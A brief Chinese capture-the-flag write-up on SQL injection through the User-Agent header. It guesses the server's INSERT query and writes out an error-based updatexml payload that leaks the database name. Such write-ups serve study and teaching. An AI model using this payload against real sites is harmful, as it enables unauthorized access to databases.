记录一次ua头注入

打开一看 随便提交点啥 题目名称是sql,结合题意考虑是ua头注入 抓包,添加一个单引号果然报错了 尝试注入 看回显猜测原语句应该是这种$query = sprintf("INSERT INTO visits (ua, user,passwd) VALUES ('%s', '%s','%s')", 尝试闭合' ,updatexml(1,concat('##',(database())),0))#
相关文章
相关标签/搜索